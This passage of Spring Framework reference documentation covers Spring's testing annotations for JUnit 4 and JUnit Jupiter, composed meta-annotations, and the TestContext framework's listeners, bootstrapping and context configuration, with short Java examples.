<<testcontext-junit4-rules,Spring's JUnit\n4 rules>>, or <<testcontext-support-classes-junit4,Spring's JUnit 4 support classes>>.\n\n===== @IfProfileValue\n`@IfProfileValue` indicates that the annotated test is enabled for a specific testing\nenvironment. If the configured `ProfileValueSource` returns a matching `value` for the\nprovided `name`, the test is enabled. Otherwise, the test will be disabled and\neffectively _ignored_.\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. 
This is analogous to the\nsemantics of JUnit 4's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit 4 environment.\nConsider the following example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n===== @ProfileValueSourceConfiguration\n`@ProfileValueSourceConfiguration` is a class-level annotation that specifies what type\nof `ProfileValueSource` to use when retrieving __profile values__ configured through the\n`@IfProfileValue` annotation. If `@ProfileValueSourceConfiguration` is not declared for a\ntest, `SystemProfileValueSource` is used by default.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @Timed\n`@Timed` indicates that the annotated test method must finish execution in a specified\ntime period (in milliseconds). If the test execution time exceeds the specified time\nperiod, the test fails.\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\nSpring's `@Timed` annotation has different semantics than JUnit 4's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit 4 handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n===== @Repeat\n`@Repeat` indicates that the annotated test method must be executed repeatedly. 
The\nnumber of times that the test method is to be executed is specified in the annotation.\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n[[integration-testing-annotations-junit-jupiter]]\n==== Spring JUnit Jupiter Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit-jupiter-extension,`SpringExtension`>> and JUnit Jupiter (i.e., the\nprogramming model in JUnit 5).\n\n===== @SpringJUnitConfig\n\n`@SpringJUnitConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` from\nthe Spring TestContext Framework. It can be used at the class level as a drop-in\nreplacement for `@ContextConfiguration`. With regard to configuration options, the only\ndifference between `@ContextConfiguration` and `@SpringJUnitConfig` is that annotated\nclasses may be declared via the `value` attribute in `@SpringJUnitConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitConfig` and\n`@ContextConfiguration` for further details.\n\n===== @SpringJUnitWebConfig\n\n`@SpringJUnitWebConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` and\n`@WebAppConfiguration` from the Spring TestContext Framework. It can be used at the class\nlevel as a drop-in replacement for `@ContextConfiguration` and `@WebAppConfiguration`.\nWith regard to configuration options, the only difference between `@ContextConfiguration`\nand `@SpringJUnitWebConfig` is that annotated classes may be declared via the `value`\nattribute in `@SpringJUnitWebConfig`. In addition, the `value` attribute from\n`@WebAppConfiguration` can only be overridden via the `resourcePath` attribute in\n`@SpringJUnitWebConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitWebConfig`,\n`@ContextConfiguration`, and `@WebAppConfiguration` for further details.\n\n===== @EnabledIf\n\n`@EnabledIf` is used to signal that the annotated JUnit Jupiter test class or test method\nis _enabled_ and should be executed if the supplied `expression` evaluates to `true`.\nSpecifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal to\n`\"true\"` (ignoring case), the test will be __enabled__. 
When applied at the class level,\nall test methods within that class are automatically enabled by default as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@EnabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@EnabledIf(\"${smoke.tests.enabled}\")`\n* Text literal \u2013 for example:\n - `@EnabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@EnabledIf(\"false\")` is equivalent\nto `@Disabled` and `@EnabledIf(\"true\")` is logically meaningless.\n\n`@EnabledIf` may be used as a meta-annotation to create custom composed annotations. For\nexample, a custom `@EnabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@EnabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Enabled on Mac OS\"\n)\npublic @interface EnabledOnMac {}\n----\n\n===== @DisabledIf\n\n`@DisabledIf` is used to signal that the annotated JUnit Jupiter test class or test\nmethod is _disabled_ and should not be executed if the supplied `expression` evaluates to\n`true`. Specifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal\nto `\"true\"` (ignoring case), the test will be __disabled__. When applied at the class\nlevel, all test methods within that class are automatically disabled as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@DisabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@DisabledIf(\"${smoke.tests.disabled}\")`\n* Text literal \u2013 for example:\n - `@DisabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@DisabledIf(\"true\")` is\nequivalent to `@Disabled` and `@DisabledIf(\"false\")` is logically meaningless.\n\n`@DisabledIf` may be used as a meta-annotation to create custom composed annotations. 
For\nexample, a custom `@DisabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@DisabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Disabled on Mac OS\"\n)\npublic @interface DisabledOnMac {}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nIt is possible to use most test-related annotations as\n<<core.adoc#beans-meta-annotations,meta-annotations>> in order to create custom _composed\nannotations_ and reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@BootstrapWith`\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat` _(only supported on JUnit 4)_\n* `@Timed` _(only supported on JUnit 4)_\n* `@IfProfileValue` _(only supported on JUnit 4)_\n* `@ProfileValueSourceConfiguration` _(only supported on JUnit 4)_\n* `@SpringJUnitConfig` _(only supported on JUnit Jupiter)_\n* `@SpringJUnitWebConfig` _(only supported on JUnit Jupiter)_\n* `@EnabledIf` _(only supported on JUnit Jupiter)_\n* `@DisabledIf` _(only supported on JUnit Jupiter)_\n\nFor example, if we discover that we are repeating the following configuration across our\n_JUnit 4_ based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_ that\ncentralizes the common test configuration for Spring like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTestConfig { }\n----\n\nThen we can use our custom `@TransactionalDevTestConfig` annotation to simplify the\nconfiguration of individual JUnit 4 based test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class UserRepositoryTests { }\n----\n\nIf we are writing tests using JUnit Jupiter, we can reduce code duplication even further\nsince annotations in JUnit 5 can also be used as meta-annotations. 
For example, if we
discover that we are repeating the following configuration across our JUnit Jupiter based
test suite...

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ExtendWith(SpringExtension.class)
	@ContextConfiguration({"/app-config.xml", "/test-data-access-config.xml"})
	@ActiveProfiles("dev")
	@Transactional
	class OrderRepositoryTests { }

	@ExtendWith(SpringExtension.class)
	@ContextConfiguration({"/app-config.xml", "/test-data-access-config.xml"})
	@ActiveProfiles("dev")
	@Transactional
	class UserRepositoryTests { }
----

We can reduce the above duplication by introducing a custom _composed annotation_
that centralizes the common test configuration for Spring and JUnit Jupiter like this:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Target(ElementType.TYPE)
	@Retention(RetentionPolicy.RUNTIME)
	@ExtendWith(SpringExtension.class)
	@ContextConfiguration({"/app-config.xml", "/test-data-access-config.xml"})
	@ActiveProfiles("dev")
	@Transactional
	public @interface TransactionalDevTestConfig { }
----

Then we can use our custom `@TransactionalDevTestConfig` annotation to simplify the
configuration of individual JUnit Jupiter based test classes as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@TransactionalDevTestConfig
	class OrderRepositoryTests { }

	@TransactionalDevTestConfig
	class UserRepositoryTests { }
----

Since JUnit Jupiter supports the use of `@Test`, `@RepeatedTest`, `@ParameterizedTest`,
etc. as meta-annotations, it is also possible to create custom composed annotations at
the test method level. For example, if we wish to create a _composed annotation_ that
combines the `@Test` and `@Tag` annotations from JUnit Jupiter with the `@Transactional`
annotation from Spring, we could create an `@TransactionalIntegrationTest` annotation as
follows.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Target(ElementType.METHOD)
	@Retention(RetentionPolicy.RUNTIME)
	@Transactional
	@Tag("integration-test") // org.junit.jupiter.api.Tag
	@Test // org.junit.jupiter.api.Test
	public @interface TransactionalIntegrationTest { }
----

Then we can use our custom `@TransactionalIntegrationTest` annotation to simplify the
configuration of individual JUnit Jupiter based test methods as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@TransactionalIntegrationTest
	void saveOrder() { }

	@TransactionalIntegrationTest
	void deleteOrder() { }
----

For further details, consult the <<core.adoc#annotation-programming-model,Spring
Annotation Programming Model>>.


[[testcontext-framework]]
=== Spring TestContext Framework
The __Spring TestContext Framework__ (located in the
`org.springframework.test.context` package) provides generic, annotation-driven unit and
integration testing support that is agnostic of the testing framework in use. The
TestContext framework also places a great deal of importance on __convention over
configuration__ with reasonable defaults that can be overridden through annotation-based
configuration.

In addition to generic testing infrastructure, the TestContext framework provides
explicit support for JUnit 4, JUnit Jupiter (a.k.a., JUnit 5), and TestNG. For JUnit 4
and TestNG, Spring provides `abstract` support classes.
Furthermore, Spring provides a\ncustom JUnit `Runner` and custom JUnit `Rules` for _JUnit 4_ as well as a custom\n`Extension` for _JUnit Jupiter_ that allow one to write so-called __POJO test classes__.\nPOJO test classes are not required to extend a particular class hierarchy such as the\n`abstract` support classes.\n\nThe following section provides an overview of the internals of the TestContext framework.\nIf you are only interested in _using_ the framework and not necessarily interested in\n_extending_ it with your own custom listeners or custom loaders, feel free to go directly\nto the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContextManager` class and the\n`TestContext`, `TestExecutionListener`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created per test class (e.g., for the execution of all test\nmethods within a single test class in JUnit Jupiter). The `TestContextManager` in turn\nmanages a `TestContext` that holds the context of the current test. The\n`TestContextManager` also updates the state of the `TestContext` as the test progresses\nand delegates to `TestExecutionListener` implementations, which instrument the actual\ntest execution by providing dependency injection, managing transactions, and so on. A\n`SmartContextLoader` is responsible for loading an `ApplicationContext` for a given test\nclass. Consult the javadocs and the Spring test suite for further information and\nexamples of various implementations.\n\n===== TestContext\n`TestContext` encapsulates the context in which a test is executed, agnostic of the\nactual testing framework in use, and provides context management and caching support for\nthe test instance for which it is responsible. The `TestContext` also delegates to a\n`SmartContextLoader` to load an `ApplicationContext` if requested.\n\n===== TestContextManager\n`TestContextManager` is the main entry point into the __Spring TestContext Framework__\nand is responsible for managing a single `TestContext` and signaling events to each\nregistered `TestExecutionListener` at well-defined test execution points:\n\n* prior to any __before class__ or __before all__ methods of a particular testing framework\n* test instance post-processing\n* prior to any __before__ or __before each__ methods of a particular testing framework\n* immediately before execution of the test method but after test setup\n* immediately after execution of the test method but before test tear down\n* after any __after__ or __after each__ methods of a particular testing framework\n* after any __after class__ or __after all__ methods of a particular testing framework\n\n===== TestExecutionListener\n`TestExecutionListener` defines the API for reacting to test execution events published\nby the `TestContextManager` with which the listener is registered. 
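As a minimal sketch (the listener class and its log output are hypothetical, not one of
Spring's own listeners), a custom listener typically extends
`AbstractTestExecutionListener` and overrides only the callbacks it needs:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import org.springframework.test.context.TestContext;
	import org.springframework.test.context.support.AbstractTestExecutionListener;

	// hypothetical listener that traces test execution events
	public class LoggingTestExecutionListener extends AbstractTestExecutionListener {

		@Override
		public void beforeTestMethod(TestContext testContext) throws Exception {
			// invoked prior to any before or before-each methods of the testing framework
			System.out.println("Before test: " + testContext.getTestMethod().getName());
		}

		@Override
		public void afterTestMethod(TestContext testContext) throws Exception {
			// invoked after any after or after-each methods of the testing framework
			System.out.println("After test: " + testContext.getTestMethod().getName());
		}
	}
----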
See\n<<testcontext-tel-config>>.\n\n===== Context Loaders\n`ContextLoader` is a strategy interface that was introduced in Spring 2.5 for loading an\n`ApplicationContext` for an integration test managed by the Spring TestContext Framework.\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and `WebApplicationContext` support.\n\n`SmartContextLoader` is an extension of the `ContextLoader` interface introduced in\nSpring 3.1. The `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was\nintroduced in Spring 2.5. Specifically, a `SmartContextLoader` can choose to process\nresource `locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\nSpring provides the following implementations:\n\n* `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n* `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n* `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n* `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n* `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n* `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n* `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\n[[testcontext-bootstrapping]]\n==== Bootstrapping the TestContext framework\n\nThe default configuration for the internals of the Spring TestContext Framework is\nsufficient for all common use cases. However, there are times when a development team or\nthird party framework would like to change the default `ContextLoader`, implement a\ncustom `TestContext` or `ContextCache`, augment the default sets of\n`ContextCustomizerFactory` and `TestExecutionListener` implementations, etc. 
For such low\nlevel control over how the TestContext framework operates, Spring provides a\nbootstrapping strategy.\n\n`TestContextBootstrapper` defines the SPI for _bootstrapping_ the TestContext framework.\nA `TestContextBootstrapper` is used by the `TestContextManager` to load the\n`TestExecutionListener` implementations for the current test and to build the\n`TestContext` that it manages. A custom bootstrapping strategy can be configured for a\ntest class (or test class hierarchy) via `@BootstrapWith`, either directly or as a\nmeta-annotation. If a bootstrapper is not explicitly configured via `@BootstrapWith`,\neither the `DefaultTestContextBootstrapper` or the `WebTestContextBootstrapper` will be\nused, depending on the presence of `@WebAppConfiguration`.\n\nSince the `TestContextBootstrapper` SPI is likely to change in the future in order to\naccommodate new requirements, implementers are strongly encouraged not to implement this\ninterface directly but rather to extend `AbstractTestContextBootstrapper` or one of its\nconcrete subclasses instead.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ``TestExecutionListener``s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ``TestExecutionListener``s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. Since Spring\nFramework 4.1, this issue is addressed via support for automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n``TestExecutionListener``s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. 
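As a sketch of what such a declaration looks like (the listener class name below is
hypothetical), an entry in `META-INF/spring.factories` takes the following form:

[source,properties,indent=0]
----
	# META-INF/spring.factories
	org.springframework.test.context.TestExecutionListener = \
		com.example.MyCustomTestExecutionListener
----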
Third-party frameworks and developers can\ncontribute their own ``TestExecutionListener``s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ``TestExecutionListener``s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n``TestExecutionListener``s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ``TestExecutionListener``s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ``TestExecutionListener``s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1, and `DirtiesContextBeforeModesTestExecutionListener`\nwas introduced in Spring Framework 4.2. Furthermore, third-party frameworks like Spring\nSecurity register their own default ``TestExecutionListener``s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. 
If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. 
In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an 